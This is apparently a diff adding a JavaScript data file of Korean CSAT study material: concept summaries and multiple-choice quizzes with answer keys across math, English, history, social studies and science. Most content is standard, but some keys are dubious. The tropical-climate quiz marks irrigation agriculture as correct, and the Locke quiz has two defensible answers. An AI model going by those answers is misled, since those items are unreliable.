+            }
+          ],
+          quizzes: [
+            {
+              q: "순열과 조합의 차이는?",
+              options: ["순열은 순서 무관", "조합은 순서 고려", "순열은 순서 고려", "둘 다 순서 무관", "둘 다 순서 고려"],
+              answer: 2,
+              explanation: "순열은 순서를 고려하고 조합은 순서를 고려하지 않는다."
+            },
+            {
+              q: "여사건의 확률을 구하는 공식은?",
+              options: ["1+P(A)", "1-P(A)", "P(A)^2", "P(A)/2", "P(A)-1"],
+              answer: 1,
+              explanation: "여사건의 확률은 1-P(A)이다."
+            },
+            {
+              q: "표본 평균에 대한 설명으로 옳은 것은?",
+              options: ["모집단 평균과 무관", "항상 표준편차", "모집단 평균의 추정량", "확률이 0", "순열 결과"],
+              answer: 2,
+              explanation: "표본 평균은 모집단 평균을 추정하는 통계량이다."
+            }
+          ]
+        },
+        "미적분": {
+          concepts: [
+            {
+              title: "수열의 극한",
+              content: "수열의 극한은 n이 커질 때 수열이 특정 값에 가까워지는지를 보는 것이다. 분수 형태는 최고차항을 비교해 계산하고, 무한 급수의 수렴 조건과도 연결된다. 수능에서는 수열의 수렴·발산을 빠르게 판별하는 능력이 중요하다."
+            },
+            {
+              title: "합성함수 미분",
+              content: "합성함수 미분은 체인 룰을 적용한다. 외부 함수의 미분에 내부 함수의 미분을 곱해야 하며, 복잡한 함수에서도 단계적으로 적용해야 한다. 수능에서는 합성함수 미분과 음함수 미분을 함께 묻는 문제가 출제된다."
+            },
+            {
+              title: "적분 활용",
+              content: "적분은 넓이, 부피, 평균값 등 다양한 응용에 사용된다. 회전체 부피는 원판법이나 원통껍질법으로 계산하며, 구간 설정이 핵심이다. 수능에서는 함수의 교점을 찾고 부호를 고려해 적분 구간을 나누는 문제가 자주 출제된다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "수열이 수렴하려면 필요한 조건은?",
+              options: ["무한히 증가", "무한히 감소", "특정 값에 수렴", "진동", "무한 발산"],
+              answer: 2,
+              explanation: "수열이 특정 값에 가까워져야 수렴한다."
+            },
+            {
+              q: "합성함수 미분에서 사용하는 공식은?",
+              options: ["곱의 미분", "체인 룰", "부분적분", "치환적분", "적분 by parts"],
+              answer: 1,
+              explanation: "합성함수 미분은 체인 룰을 적용한다."
+            },
+            {
+              q: "회전체 부피 계산에 사용되는 방법은?",
+              options: ["원판법", "로그 변환", "행렬", "미분만 사용", "등차수열"],
+              answer: 0,
+              explanation: "회전체 부피는 원판법이나 원통껍질법으로 계산한다."
+            }
+          ]
+        },
+        "기하": {
+          concepts: [
+            {
+              title: "벡터의 연산",
+              content: "벡터는 크기와 방향을 가진 양이며, 덧셈과 스칼라 곱으로 연산된다. 성분 형태로 표현하면 기하적 계산이 쉬워지고, 두 벡터의 내적은 각도와 길이를 연결한다. 수능에서는 내적을 활용한 직각 여부 판별이나 거리 계산 문제가 출제된다."
+            },
+            {
+              title: "직선과 평면",
+              content: "공간에서 직선의 방정식은 방향벡터와 한 점으로 결정되고, 평면은 법선벡터와 한 점으로 나타낼 수 있다. 두 평면의 교선, 직선과 평면의 관계를 분석하면 공간 도형 문제를 해결할 수 있다."
+            },
+            {
+              title: "원뿔곡선",
+              content: "원뿔곡선은 타원, 포물선, 쌍곡선을 포함하며, 각 곡선은 정의와 초점의 성질로 구분된다. 수능에서는 표준형 방정식을 분석해 축과 초점의 위치를 찾는 문제와, 광학적 성질을 해석하는 문제도 등장한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "두 벡터의 내적이 0이면 무엇을 의미하는가?",
+              options: ["평행", "수직", "길이 동일", "방향 동일", "교차"],
+              answer: 1,
+              explanation: "내적이 0이면 두 벡터는 서로 수직이다."
+            },
+            {
+              q: "평면의 방정식을 결정하는 요소는?",
+              options: ["법선벡터와 한 점", "길이만", "각도만", "두 점만", "면적만"],
+              answer: 0,
+              explanation: "평면은 법선벡터와 한 점으로 결정된다."
+            },
+            {
+              q: "포물선의 정의로 옳은 것은?",
+              options: ["두 초점의 거리 일정", "한 점과 한 직선의 거리 같음", "두 점의 거리 일정", "반지름 일정", "세 점의 합 일정"],
+              answer: 1,
+              explanation: "포물선은 한 점과 한 직선까지의 거리가 같은 점들의 자취다."
+            }
+          ]
+        }
+      },
+      "영어": {
+        "독해": {
+          concepts: [
+            {
+              title: "주제 파악",
+              content: "독해에서 주제는 글 전체를 관통하는 핵심 메시지다. 반복되는 키워드와 문단의 결론을 통해 주제를 파악할 수 있으며, 세부 사례는 주제를 뒷받침하는 역할을 한다. 수능에서는 주제와 제목을 구분하여 적절한 요약을 요구한다."
+            },
+            {
+              title: "문장 삽입",
+              content: "문장 삽입 문제는 글의 흐름과 연결어를 분석해야 한다. 지시어와 대명사가 무엇을 가리키는지 확인하고, 문단의 논리 전개(원인-결과, 대조, 예시)를 파악하면 적절한 위치를 찾을 수 있다."
+            },
+            {
+              title: "빈칸 추론",
+              content: "빈칸 추론은 문맥과 논리 구조를 통해 핵심 의미를 찾아야 한다. 특히 전후 문장과의 연결 관계를 확인하고, 글쓴이의 주장이나 결론이 빈칸과 어떻게 연결되는지 분석한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "주제 파악 문제에서 가장 효과적인 전략은?",
+              options: ["문장 길이만 확인", "반복되는 핵심 단어 찾기", "문법만 분석", "첫 문장만 읽기", "마지막 문장만 읽기"],
+              answer: 1,
+              explanation: "반복되는 핵심 단어는 주제를 드러낸다."
+            },
+            {
+              q: "문장 삽입 문제에서 중요한 단서는?",
+              options: ["발음", "대명사와 지시어", "철자", "문장 길이", "어순"],
+              answer: 1,
+              explanation: "대명사와 지시어는 앞뒤 문장 연결을 보여준다."
+            },
+            {
+              q: "빈칸 추론 문제 해결에 필요한 사고는?",
+              options: ["문맥 흐름 파악", "발음 확인", "어휘 철자 암기", "문장만 번역", "단어만 추측"],
+              answer: 0,
+              explanation: "문맥 흐름을 분석해야 빈칸 의미를 추론할 수 있다."
+            }
+          ]
+        },
+        "문법": {
+          concepts: [
+            {
+              title: "관계대명사",
+              content: "관계대명사는 선행사를 수식하며 who, which, that 등이 있다. 주격, 목적격, 소유격으로 구분되고, 전치사+관계대명사 구조도 자주 등장한다. 수능에서는 관계대명사 생략 가능 여부와 문장 구조를 분석하는 문제가 출제된다."
+            },
+            {
+              title: "가정법",
+              content: "가정법 과거는 현재 사실과 반대되는 상황을 나타내며 If + 과거, would + 동사원형 구조를 사용한다. 가정법 과거완료는 과거 사실과 반대 상황을 나타내며 If + had p.p., would have p.p.로 표현한다. 시제 일치가 핵심이다."
+            },
+            {
+              title: "분사구문",
+              content: "분사구문은 부사절을 축약한 형태로, 주어가 같을 때 접속사와 주어를 생략한다. 시간, 이유, 조건, 양보 등 다양한 의미를 가진다. 문장의 의미를 파악해 분사구문이 어떤 역할을 하는지 판단해야 한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "관계대명사 who가 받는 선행사는?",
+              options: ["사람", "사물", "장소", "시간", "이유"],
+              answer: 0,
+              explanation: "who는 사람을 선행사로 받는다."
+            },
+            {
+              q: "가정법 과거의 형태로 옳은 것은?",
+              options: ["If + 과거, would + 동사원형", "If + 현재, will + 동사", "If + had p.p., would have p.p.", "If + 현재완료, would + 동사", "If + 과거, will + 동사"],
+              answer: 0,
+              explanation: "가정법 과거는 If + 과거, would + 동사원형이다."
+            },
+            {
+              q: "분사구문에서 주어가 다를 때 사용하는 구조는?",
+              options: ["일반 분사구문", "독립분사구문", "가정법", "관계대명사", "부정사"],
+              answer: 1,
+              explanation: "주어가 다를 때는 독립분사구문을 사용한다."
+            }
+          ]
+        }
+      },
+      "한국사": {
+        "한국사": {
+          concepts: [
+            {
+              title: "고대 국가의 발전",
+              content: "고조선에서 삼국 시대로 이어지는 과정은 중앙 집권 체제가 형성되는 흐름이다. 고구려, 백제, 신라는 각기 다른 정치 제도와 대외 관계를 발전시켰으며, 삼국 통일은 동아시아 질서 변화와 맞물려 이루어졌다. 시대별 정치 체제와 문화적 특징을 비교해 이해하는 것이 중요하다."
+            },
+            {
+              title: "고려와 조선의 통치",
+              content: "고려는 2성 6부 체제를 중심으로 귀족 사회를 운영했으며, 무신 정변과 몽골 침입을 겪으며 정치 구조가 변화했다. 조선은 성리학을 통치 이념으로 삼아 중앙 집권 체제를 강화했고, 경국대전 편찬과 과거 제도를 통해 유교적 질서를 확립했다."
+            },
+            {
+              title: "근현대사의 전개",
+              content: "개항 이후 조선은 외세의 침략과 내부 개혁 요구 속에서 변동을 겪었다. 일제강점기에는 독립운동이 전개되었고, 광복 이후 분단과 한국전쟁을 거쳐 현대 민주화와 경제 성장으로 이어졌다. 사건의 원인과 결과, 국제 정세를 함께 이해해야 한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "삼국 통일 과정과 관련된 설명으로 옳은 것은?",
+              options: ["백제가 고구려와 연합", "신라가 당과 연합", "고구려가 신라를 지원", "가야가 통일 주도", "발해가 삼국 통일"],
+              answer: 1,
+              explanation: "신라는 당과 연합하여 삼국 통일을 추진했다."
+            },
+            {
+              q: "조선의 통치 이념으로 옳은 것은?",
+              options: ["불교", "성리학", "도가", "법가", "실학"],
+              answer: 1,
+              explanation: "조선은 성리학을 통치 이념으로 삼았다."
+            },
+            {
+              q: "일제강점기 독립운동의 특징으로 옳은 것은?",
+              options: ["단일 조직만 활동", "무장 투쟁과 외교 활동 병행", "정치 활동 전면 금지", "외교 활동 부재", "해외 활동 없음"],
+              answer: 1,
+              explanation: "독립운동은 무장 투쟁, 외교 활동 등 다양한 방식으로 전개되었다."
+            }
+          ]
+        }
+      },
+      "사회탐구": {
+        "생활과 윤리": {
+          concepts: [
+            {
+              title: "공리주의",
+              content: "공리주의는 최대 다수의 최대 행복을 도덕 판단 기준으로 삼는다. 벤담은 쾌락의 양을, 밀은 질적 차이를 강조했다. 사회 정책이나 윤리 문제에서 효용을 고려하지만, 소수 권리가 침해될 수 있다는 비판이 존재한다."
+            },
+            {
+              title: "칸트 의무론",
+              content: "칸트는 결과보다 의무와 동기를 중시하며, 정언명령을 통해 보편화 가능성을 강조했다. 인간을 수단이 아닌 목적으로 대우해야 한다는 점은 인권 윤리의 기초가 된다. 상황적 유연성이 부족하다는 점도 함께 이해해야 한다."
+            },
+            {
+              title: "생명 윤리",
+              content: "생명 윤리는 낙태, 안락사, 장기이식 등 생명의 시작과 끝에 관한 윤리적 쟁점을 다룬다. 자기 결정권과 생명 존엄성 사이의 균형이 핵심이며, 과학 기술 발전이 새로운 윤리 문제를 제기한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "공리주의의 핵심 원리는?",
+              options: ["의무 준수", "최대 행복", "중용", "정의", "계약"],
+              answer: 1,
+              explanation: "공리주의는 최대 행복을 기준으로 도덕을 판단한다."
+            },
+            {
+              q: "칸트의 정언명령은 무엇을 강조하는가?",
+              options: ["결과 중심", "보편화 가능성", "감정 중심", "효용 극대화", "관습 유지"],
+              answer: 1,
+              explanation: "정언명령은 보편화 가능한 도덕 원리를 강조한다."
+            },
+            {
+              q: "생명 윤리에서 핵심 쟁점으로 옳은 것은?",
+              options: ["무역 규제", "안락사", "도시화", "세금 제도", "인구 분포"],
+              answer: 1,
+              explanation: "안락사는 생명 윤리의 대표적 쟁점이다."
+            }
+          ]
+        },
+        "윤리와 사상": {
+          concepts: [
+            {
+              title: "유교 윤리",
+              content: "유교는 인(仁), 의(義), 예(禮)를 중심으로 도덕적 질서를 강조한다. 인간 관계의 조화와 사회적 책임을 중시하며, 효와 충을 통해 공동체 윤리를 유지한다. 수능에서는 유교와 다른 사상의 차이를 비교하는 문제가 출제된다."
+            },
+            {
+              title: "불교 사상",
+              content: "불교는 고통의 원인을 집착으로 보고, 팔정도와 사성제를 통해 해탈을 추구한다. 연기설은 모든 존재가 상호 의존적임을 강조하며, 자비와 중도를 실천 윤리로 삼는다. 현대 윤리 문제에서도 불교의 관점이 적용된다."
+            },
+            {
+              title: "서양 근대 사상",
+              content: "근대 서양 사상은 개인의 자유와 이성을 강조한다. 로크의 자연권 사상, 루소의 사회 계약, 홉스의 국가론은 정치 윤리와 연결된다. 수능에서는 각 사상의 인간관, 국가관 차이를 비교하는 문제가 등장한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "유교 윤리의 핵심 가치로 옳은 것은?",
+              options: ["무위", "자비", "인의예", "실존", "허무"],
+              answer: 2,
+              explanation: "유교는 인·의·예를 핵심 가치로 삼는다."
+            },
+            {
+              q: "불교의 연기설 의미는?",
+              options: ["모든 존재는 상호 의존", "인간은 절대적", "신이 세계를 창조", "물질만 존재", "윤회 없음"],
+              answer: 0,
+              explanation: "연기설은 모든 존재가 상호 의존함을 말한다."
+            },
+            {
+              q: "로크의 자연권에 해당하지 않는 것은?",
+              options: ["생명", "자유", "재산", "평등", "정당한 정부"],
+              answer: 4,
+              explanation: "로크의 자연권은 생명, 자유, 재산이다."
+            }
+          ]
+        },
+        "한국지리": {
+          concepts: [
+            {
+              title: "지형과 기후",
+              content: "한반도는 동고서저 지형을 이루며, 산지와 하천이 발달해 있다. 기후는 계절풍 영향으로 여름에 강수량이 집중되고, 지역에 따라 해양성·대륙성 특징이 다르게 나타난다. 지형과 기후의 결합이 지역 생활 방식에 영향을 준다."
+            },
+            {
+              title: "인구 분포",
+              content: "한국의 인구는 수도권과 대도시에 집중되어 있으며, 산업 구조와 교통망이 인구 분포에 영향을 준다. 고령화와 저출산으로 인구 구조가 변화하며, 지역 간 불균형 문제도 심화되고 있다. 인구 피라미드 분석이 필수다."
+            },
+            {
+              title: "산업 구조",
+              content: "산업 구조는 1차에서 3차 산업 중심으로 변화했으며, 첨단 제조업과 서비스업이 경제를 이끌고 있다. 산업 입지 요인은 자원, 노동력, 시장 접근성 등으로 구분된다. 수능에서는 산업 변화와 공간 분포를 연결해 분석한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "한반도의 지형 특징으로 옳은 것은?",
+              options: ["서고동저", "동고서저", "남고북저", "평탄 지형", "사막 지형"],
+              answer: 1,
+              explanation: "한반도는 동고서저 지형이 특징이다."
+            },
+            {
+              q: "한국 인구가 수도권에 집중되는 이유는?",
+              options: ["기후만 영향", "산업과 교통 집중", "자원 분포", "농업 중심", "해양성 기후"],
+              answer: 1,
+              explanation: "산업과 교통망이 수도권 집중을 강화한다."
+            },
+            {
+              q: "산업 입지 요인에 해당하지 않는 것은?",
+              options: ["자원", "노동력", "시장 접근성", "문화 전통", "교통"],
+              answer: 3,
+              explanation: "문화 전통은 주요 산업 입지 요인으로 보기 어렵다."
+            }
+          ]
+        },
+        "세계지리": {
+          concepts: [
+            {
+              title: "기후대와 생활",
+              content: "세계는 열대, 온대, 한대 등 기후대로 구분되며, 기후는 의식주와 경제 활동에 영향을 준다. 사막 지역은 관개 농업이 발달하고, 온대 지역은 혼합 농업과 공업이 발전한다. 기후와 인간 활동의 상호 작용을 이해해야 한다."
+            },
+            {
+              title: "인구 이동",
+              content: "세계 인구 이동은 경제 격차, 정치 불안, 환경 변화에 의해 발생한다. 이민은 노동력 재배치와 문화 다양성을 확대하지만, 갈등과 차별 문제도 발생한다. 수능에서는 이주 원인과 결과를 종합적으로 분석한다."
+            },
+            {
+              title: "도시화",
+              content: "도시화는 산업화와 함께 진행되며, 메가시티와 도시권 확장이 특징이다. 과도한 도시화는 주택 문제, 교통 혼잡, 환경 오염을 유발한다. 도시화의 긍정적·부정적 영향을 균형 있게 이해해야 한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "열대 기후 지역의 생활 특성으로 옳은 것은?",
+              options: ["난방 중심", "관개 농업", "빙하 관광", "수렵 중심", "풍력 발전"],
+              answer: 1,
+              explanation: "열대 지역은 강수 패턴에 따라 관개 농업이 발달한다."
+            },
+            {
+              q: "세계 인구 이동의 주요 원인이 아닌 것은?",
+              options: ["경제 격차", "정치 불안", "환경 변화", "지형 고정", "전쟁"],
+              answer: 3,
+              explanation: "지형 고정은 인구 이동 원인으로 보기 어렵다."
+            },
+            {
+              q: "도시화의 부정적 영향으로 옳은 것은?",
+              options: ["문화 다양성 증가", "교통 혼잡", "경제 성장", "일자리 증가", "기술 혁신"],
+              answer: 1,
+              explanation: "도시화는 교통 혼잡과 환경 문제를 유발할 수 있다."
+            }
+          ]
+        },
+        "동아시아사": {
+          concepts: [
+            {
+              title: "중국 왕조의 변화",
+              content: "동아시아사는 중국 왕조의 교체와 주변국 관계를 중심으로 전개된다. 진·한 제국의 통치 체제, 당·송의 발전, 명·청의 해금 정책 등이 지역 질서를 형성했다. 왕조 변화가 주변국에 미친 영향을 함께 파악해야 한다."
+            },
+            {
+              title: "조공과 책봉",
+              content: "조공-책봉 체제는 동아시아 국제 질서의 기본 틀이었다. 중국 중심의 질서 속에서 주변국은 자율성을 유지하면서도 외교적 정당성을 확보했다. 수능에서는 조공 체제의 특징과 실제 외교 관계의 차이를 비교한다."
+            },
+            {
+              title: "근대 동아시아의 격변",
+              content: "19세기 이후 서구 열강의 침략과 일본의 부상으로 동아시아 질서가 재편되었다. 아편전쟁, 청일전쟁, 러일전쟁은 전통 질서를 붕괴시키고 근대 국가 형성에 영향을 주었다. 사건의 연계를 이해해야 한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "조공-책봉 체제의 특징으로 옳은 것은?",
+              options: ["상호 대등 외교", "중국 중심 질서", "단절된 외교", "현대 국제법", "국제 기구 중심"],
+              answer: 1,
+              explanation: "조공-책봉은 중국 중심 국제 질서를 의미한다."
+            },
+            {
+              q: "동아시아 근대 질서 변화를 촉발한 사건은?",
+              options: ["진시황 통일", "아편전쟁", "몽골 침입", "한나라 성립", "삼국 통일"],
+              answer: 1,
+              explanation: "아편전쟁은 서구 열강 침입의 출발점이었다."
+            },
+            {
+              q: "청일전쟁의 결과로 옳은 것은?",
+              options: ["조선의 자주 독립 강화", "일본의 조선 영향력 확대", "중국의 대외 팽창", "러시아 철수", "미국의 개입"],
+              answer: 1,
+              explanation: "청일전쟁 이후 일본의 영향력이 강화되었다."
+            }
+          ]
+        },
+        "세계사": {
+          concepts: [
+            {
+              title: "고대 문명",
+              content: "세계 고대 문명은 메소포타미아, 이집트, 인더스, 중국 황허 문명으로 대표된다. 각 문명은 강 유역에서 발생했으며, 농업 생산력과 종교, 정치 체제를 발전시켰다. 문명의 공통점과 차이를 비교하는 것이 중요하다."
+            },
+            {
+              title: "중세와 근대 전환",
+              content: "중세 유럽은 봉건제와 교회 권력이 중심이었지만, 르네상스와 종교개혁을 통해 근대로 전환되었다. 신항로 개척은 세계 교역을 확대하고 식민지를 형성했다. 이러한 변화를 연대기적으로 이해해야 한다."
+            },
+            {
+              title: "현대 세계 질서",
+              content: "20세기는 두 차례 세계대전과 냉전 체제를 거치며 국제 질서가 재편되었다. 탈냉전 이후에는 국제기구와 지역 협력체가 중요해졌고, 세계화와 경제 통합이 확대되었다. 주요 사건의 원인과 결과를 분석해야 한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "고대 문명이 공통적으로 발생한 지리적 배경은?",
+              options: ["사막", "고산", "강 유역", "빙하", "열대 우림"],
+              answer: 2,
+              explanation: "고대 문명은 강 유역에서 발생했다."
+            },
+            {
+              q: "근대 전환에 큰 영향을 준 사건은?",
+              options: ["십자군 전쟁", "르네상스와 종교개혁", "프랑크 왕국", "아케메네스 왕조", "오스만 성립"],
+              answer: 1,
+              explanation: "르네상스와 종교개혁은 근대 전환의 핵심 사건이다."
+            },
+            {
+              q: "냉전 체제의 특징으로 옳은 것은?",
+              options: ["단극 질서", "미·소 양극 질서", "제국주의 붕괴", "국제 기구 부재", "식민지 확대"],
+              answer: 1,
+              explanation: "냉전은 미국과 소련의 양극 체제로 특징된다."
+            }
+          ]
+        },
+        "경제": {
+          concepts: [
+            {
+              title: "수요와 공급",
+              content: "수요는 가격이 상승하면 감소하는 경향이 있고, 공급은 가격이 상승하면 증가하는 경향이 있다. 수요·공급 곡선의 교점에서 균형 가격과 거래량이 결정된다. 정책 변화나 외부 충격이 균형에 미치는 영향을 분석해야 한다."
+            },
+            {
+              title: "시장 실패",
+              content: "시장 실패는 외부 효과, 공공재, 정보 비대칭 등으로 인해 자원이 효율적으로 배분되지 않는 상황이다. 정부는 세금, 보조금, 규제 등을 통해 시장 실패를 교정한다. 수능에서는 시장 실패 원인과 정책 대안을 비교한다."
+            },
+            {
+              title: "국가 경제",
+              content: "국가 경제는 GDP, 실업률, 물가 상승률 등을 통해 측정된다. 경제 성장과 안정은 상충할 수 있으며, 재정 정책과 통화 정책으로 조절한다. 수능에서는 경제 지표의 의미와 정책 효과를 종합적으로 파악해야 한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "수요 곡선의 특징으로 옳은 것은?",
+              options: ["우상향", "우하향", "수평", "수직", "곡선 없음"],
+              answer: 1,
+              explanation: "수요 곡선은 가격 상승 시 수요가 감소하므로 우하향한다."
+            },
+            {
+              q: "시장 실패의 원인이 아닌 것은?",
+              options: ["외부 효과", "공공재", "정보 비대칭", "완전 경쟁", "독점"],
+              answer: 3,
+              explanation: "완전 경쟁은 시장 효율성을 높이는 요인이다."
+            },
+            {
+              q: "물가 상승률은 어떤 지표로 측정하는가?",
+              options: ["GDP", "소비자물가지수", "실업률", "환율", "이자율"],
+              answer: 1,
+              explanation: "물가 상승률은 소비자물가지수로 측정한다."
+            }
+          ]
+        },
+        "정치와 법": {
+          concepts: [
+            {
+              title: "민주주의와 선거",
+              content: "민주주의는 국민 주권, 권력 분립, 법치주의를 기본 원리로 한다. 선거 제도는 대표성 확보를 위해 다양한 방식이 있으며, 다수결 원칙과 소수 의견 보호의 균형이 중요하다. 수능에서는 선거 제도의 장단점을 분석하는 문제가 출제된다."
+            },
+            {
+              title: "헌법과 기본권",
+              content: "헌법은 국가의 최고 규범으로 기본권을 보장한다. 기본권은 자유권, 평등권, 사회권 등으로 구분되며, 국가 권력은 이를 침해할 수 없다. 수능에서는 기본권 제한의 요건과 판례를 활용한 문제가 출제된다."
+            },
+            {
+              title: "사법과 법치",
+              content: "사법 제도는 법을 해석하고 적용하는 역할을 하며, 법치주의는 모든 국가 권력이 법에 의해 제한된다는 원칙이다. 재판의 공정성, 법 앞의 평등이 강조되며, 위헌법률심판 제도도 함께 이해해야 한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "민주주의의 기본 원리로 옳지 않은 것은?",
+              options: ["국민 주권", "권력 분립", "법치주의", "왕권 신수", "다수결"],
+              answer: 3,
+              explanation: "왕권 신수는 민주주의 원리와 반대된다."
+            },
+            {
+              q: "기본권 중 사회권의 예는?",
+              options: ["언론의 자유", "행복추구권", "교육 받을 권리", "거주 이전의 자유", "재산권"],
+              answer: 2,
+              explanation: "교육 받을 권리는 사회권에 해당한다."
+            },
+            {
+              q: "법치주의의 의미로 옳은 것은?",
+              options: ["권력자의 자의적 통치", "법에 의한 통치", "관습법 우선", "군사 통치", "법률 무시"],
+              answer: 1,
+              explanation: "법치주의는 권력이 법에 의해 제한되는 원리이다."
+            }
+          ]
+        },
+        "사회·문화": {
+          concepts: [
+            {
+              title: "사회화",
+              content: "사회화는 개인이 사회 규범과 문화를 내면화하는 과정이다. 1차 사회화는 가족, 2차 사회화는 학교와 또래 집단 등에서 이루어진다. 사회화는 개인의 정체성과 사회 질서를 유지하는 데 필수적이다."
+            },
+            {
+              title: "문화 상대주의",
+              content: "문화 상대주의는 각 문화가 고유한 가치 체계를 가진다는 관점이다. 다른 문화를 평가할 때 자신의 문화 기준만 적용하면 문화 사대주의나 자민족 중심주의에 빠질 수 있다. 수능에서는 문화 이해 태도를 비교하는 문제가 출제된다."
+            },
+            {
+              title: "사회 불평등",
+              content: "사회 불평등은 경제, 교육, 직업, 권력 등 다양한 영역에서 나타난다. 개인의 노력뿐 아니라 구조적 요인이 큰 영향을 미치며, 교육 기회 확대나 복지 정책이 불평등 해소에 활용된다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "1차 사회화가 주로 이루어지는 곳은?",
+              options: ["직장", "가족", "국가", "언론", "군대"],
+              answer: 1,
+              explanation: "1차 사회화는 가족에서 이루어진다."
+            },
+            {
+              q: "문화 상대주의의 의미로 옳은 것은?",
+              options: ["모든 문화는 동일", "각 문화의 고유 가치 인정", "자문화 우월", "문화는 변하지 않음", "문화는 개인 것"],
+              answer: 1,
+              explanation: "문화 상대주의는 각 문화의 고유 가치를 인정한다."
+            },
+            {
+              q: "사회 불평등을 완화하는 정책으로 적절한 것은?",
+              options: ["교육 기회 확대", "불평등 고착", "복지 축소", "계층 이동 제한", "차별 강화"],
+              answer: 0,
+              explanation: "교육 기회 확대는 불평등 완화에 기여한다."
+            }
+          ]
+        }
+      },
+      "과학탐구": {
+        "물리학Ⅰ": {
+          concepts: [
+            {
+              title: "운동의 표현",
+              content: "운동은 위치, 속도, 가속도를 통해 표현된다. 위치-시간 그래프의 기울기는 속도, 속도-시간 그래프의 기울기는 가속도이며, 그래프의 면적은 이동 거리를 의미한다. 그래프 해석 능력이 핵심이다."
+            },
+            {
+              title: "뉴턴 법칙",
+              content: "뉴턴의 운동 법칙은 관성, 힘과 가속도의 관계, 작용·반작용으로 구성된다. F=ma는 힘과 가속도가 비례함을 나타내고, 물체의 운동 분석에 필수적이다."
+            },
+            {
+              title: "에너지 보존",
+              content: "역학적 에너지 보존은 마찰이 없는 경우 운동 에너지와 위치 에너지의 합이 일정함을 의미한다. 위치 에너지가 운동 에너지로 전환되는 과정을 이해하면 낙하 운동과 원운동 문제를 해결할 수 있다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "속도-시간 그래프의 면적이 의미하는 것은?",
+              options: ["가속도", "이동 거리", "질량", "힘", "에너지"],
+              answer: 1,
+              explanation: "속도-시간 그래프의 면적은 이동 거리를 의미한다."
+            },
+            {
+              q: "뉴턴 제2법칙의 식은?",
+              options: ["F=ma", "E=mc^2", "p=mv", "W=Fd", "V=IR"],
+              answer: 0,
+              explanation: "뉴턴 제2법칙은 F=ma이다."
+            },
+            {
+              q: "마찰이 없을 때 역학적 에너지의 변화는?",
+              options: ["증가", "감소", "보존", "무작위", "0"],
+              answer: 2,
+              explanation: "마찰이 없으면 역학적 에너지가 보존된다."
+            }
+          ]
+        },
+        "화학Ⅰ": {
+          concepts: [
+            {
+              title: "원자 구조",
+              content: "원자는 원자핵과 전자로 구성되며, 원자핵은 양성자와 중성자로 이루어진다. 전자 배치는 원소의 화학적 성질을 결정하며, 동위 원소는 원자 번호가 같고 질량수가 다르다."
+            },
+            {
+              title: "화학 결합",
+              content: "이온 결합은 전자 이동으로 형성되고, 공유 결합은 전자 공유로 형성된다. 금속 결합은 자유 전자에 의해 금속 원자들이 결합한다. 결합 유형은 물질의 녹는점, 전기 전도성 등 성질에 영향을 준다."
+            },
+            {
+              title: "산과 염기",
+              content: "산은 수소 이온을, 염기는 수산화 이온을 내놓는 물질이다. pH는 산성도를 나타내며, 중화 반응은 물과 염을 생성한다. 수능에서는 중화 적정과 pH 계산 문제가 중요하다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "동위 원소의 특징으로 옳은 것은?",
+              options: ["원자 번호가 다름", "질량수가 다름", "전자 수가 다름", "화학 성질이 다름", "원자 번호가 다름"],
+              answer: 1,
+              explanation: "동위 원소는 원자 번호가 같고 질량수가 다르다."
+            },
+            {
+              q: "이온 결합의 형성 과정은?",
+              options: ["전자 공유", "전자 이동", "전자 제거 없음", "반응 없음", "금속 결합"],
+              answer: 1,
+              explanation: "이온 결합은 전자의 이동으로 형성된다."
+            },
+            {
+              q: "중화 반응의 생성물은?",
+              options: ["산", "염기", "물과 염", "금속", "기체"],
+              answer: 2,
+              explanation: "중화 반응은 물과 염을 생성한다."
+            }
+          ]
+        },
+        "생명과학Ⅰ": {
+          concepts: [
+            {
+              title: "세포의 구조",
+              content: "세포는 생명 활동의 기본 단위로 세포막, 세포질, 핵으로 구성된다. 세포막은 선택적 투과성을 가지며, 핵은 유전 정보를 저장한다. 세포 소기관의 기능을 이해하면 물질 대사와 에너지 흐름을 설명할 수 있다."
+            },
+            {
+              title: "유전의 원리",
+              content: "멘델의 유전 법칙은 분리의 법칙과 독립의 법칙으로 구성된다. 대립유전자의 조합이 표현형을 결정하며, 유전 확률 계산이 핵심이다. 수능에서는 단성 잡종, 다인자 유전 문제를 해결해야 한다."
+            },
+            {
+              title: "생태계의 물질 순환",
+              content: "생태계에서는 에너지가 일방향으로 흐르고, 물질은 순환한다. 생산자, 소비자, 분해자의 역할을 통해 탄소와 질소가 순환하며, 생태계 안정성에 영향을 준다. 인간 활동이 순환에 미치는 영향도 분석해야 한다."
+            }
+          ],
+          quizzes: [
+            {
+              q: "세포막의 주요 기능은?",
+              options: ["에너지 저장", "선택적 투과", "유전 정보 저장", "단백질 합성", "분열 조절"],
+              answer: 1,
+              explanation: "세포막은 선택적 투과성을 통해 물질 출입을 조절한다."
+            },
+            {
+              q: "멘델 유전 법칙 중 분리의 법칙은 무엇을 의미하는가?",
+              options: ["대립유전자가 분리", "형질이 합쳐짐", "유전자가 소실", "환경이 결정", "돌연변이"],
+              answer: 0,
+              explanation: "분리의 법칙은 대립유전자가 생식세포 형성 시 분리되는 것이다."
+            },
+            {
+              q: "생태계에서 분해자의 역할은?",
+              options: ["에너지 생산", "유기물 분해", "광합성", "수분 증발", "개체 증가"],
+              answer: 1,
+              explanation: "분해자는 유기물을 분해해 물질 순환을 돕는다."
+            }
+          ]
+        },
+        "지구과학Ⅰ": {
+          concepts: [
+            {
+              title: "지구 내부 구조",
+              content: "지구는 지각, 맨틀, 외핵, 내핵으로 구성된다. 지진파의 전달 속도와 굴절을 통해 내부 구조를 파악하며, 맨틀 대류는 판 이동의 원동력이다. 수능에서는 지진파 자료 해석 문제가 출제된다."
+            },
+            {
+              title: "대기와 기후",
